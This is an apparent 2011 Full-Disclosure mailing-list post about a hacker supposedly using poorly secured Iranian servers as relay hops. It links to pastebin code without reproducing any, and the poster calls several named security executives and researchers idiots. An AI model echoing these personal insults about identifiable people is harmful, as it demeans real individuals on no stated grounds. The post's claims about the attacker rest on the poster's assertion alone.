On Wed, Mar 23, 2011 at 1:33 PM, coderman coder...@gmail.com wrote: ... iran is pretty incompetent in most information technology respects. odds strongly favor pwn hops through their unmonitored, unmaintained, unhardened, sloppy conglomerations of servers and switches...* Iranian hacker using their systems as pwn hop: http://pastebin.com/74KXCaEZ code at: http://pastebin.com/DBDqm6Km Comodo's CEO Melih Abdulhayoglu is an idiot. Roel Schouwenberg at Kaspersky is an idiot. Mikko Hypponen at F-Secure is an idiot. some dude named Austin Heap in SF is an idiot. all you idiots are punch drunk on cyber. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
